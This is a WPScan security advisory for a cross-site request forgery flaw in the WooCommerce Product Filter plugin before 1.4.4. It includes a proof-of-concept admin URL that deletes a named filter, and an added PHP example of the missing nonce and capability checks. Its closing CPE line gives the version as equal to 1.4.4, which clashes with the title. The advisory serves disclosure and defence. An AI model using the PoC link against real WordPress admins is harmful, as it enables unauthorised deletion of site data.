wpvulndb, Erwan LR (WPScan)
WPVDB-ID: 30544377-B90D-4762-B38A-EC89BDA0DFDC
Published: Mar 11, 2024 - 12:00 a.m.

WooCommerce Product Filter < 1.4.4 - Filter Deletion via CSRF

wpscan.com
Tags: woocommerce product filter, csrf, filter deletion, security vulnerability, bulk action, cross-site request forgery, admin account, attack vector

AI Score: 6.6 Medium (Confidence: High)

EPSS: 0.0004 Low (Percentile: 9.1%)

Description

The plugin does not have a CSRF check in its bulk action, which could allow attackers to make logged-in users delete arbitrary filters via a CSRF attack, provided they know the related filter slugs.

PoC

Make a logged-in admin open the URL below to make them delete the filter with the slug test1: https://example.com/wp-admin/admin.php?page=wpf_search&action=delete&paged=1&wpf_post[]=test1&action2=delete
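The missing check, as an added example (not the plugin's own code): a WordPress bulk-action handler for the `page=wpf_search` screen that verifies a nonce and a capability before deleting the `wpf_post[]` slugs. The handler function names, the `wpf_delete_filter_by_slug()` helper, the `bulk-wpf-filters` nonce action and the `manage_woocommerce` capability are assumptions, not taken from the plugin.

```php
<?php
// Added example, not the plugin's own code. The `action=delete` and
// `wpf_post[]` request parameters come from the advisory's PoC; every
// function name and the nonce action below are assumptions.

// Unsafe pattern the advisory describes: the bulk action is executed on
// any request that carries the right parameters, so a cross-site request
// made by a logged-in admin's browser is honoured like a real submission.
function wpf_handle_bulk_unsafe() {
    if ( isset( $_REQUEST['action'] ) && 'delete' === $_REQUEST['action'] ) {
        foreach ( (array) $_REQUEST['wpf_post'] as $slug ) {
            wpf_delete_filter_by_slug( sanitize_key( $slug ) ); // hypothetical helper
        }
    }
}

// Hardened handler: the submission must carry a nonce issued for this
// action and this user, and the user must be allowed to manage filters.
function wpf_handle_bulk_hardened() {
    $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : '';
    if ( 'delete' !== $action ) {
        return;
    }
    // check_admin_referer() stops with a "link expired" screen when the
    // `_wpnonce` field is missing or was not created for `bulk-wpf-filters`.
    check_admin_referer( 'bulk-wpf-filters' );

    // Authorisation is a separate concern from CSRF: check the capability too
    // (`manage_woocommerce` is an assumed choice for a WooCommerce add-on).
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_die( 'You are not allowed to delete filters.', 403 );
    }

    $slugs = isset( $_REQUEST['wpf_post'] ) ? (array) wp_unslash( $_REQUEST['wpf_post'] ) : array();
    foreach ( $slugs as $slug ) {
        wpf_delete_filter_by_slug( sanitize_key( $slug ) ); // hypothetical helper
    }
}

// Where the bulk form is rendered, emit the matching nonce as a hidden
// `_wpnonce` field so legitimate submissions pass the check above.
function wpf_render_bulk_nonce() {
    wp_nonce_field( 'bulk-wpf-filters' );
}
```

A GET link such as the PoC URL carries no `_wpnonce`, so the hardened handler rejects it before any filter is touched.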

Affected CPE: operator eq, version 1.4.4
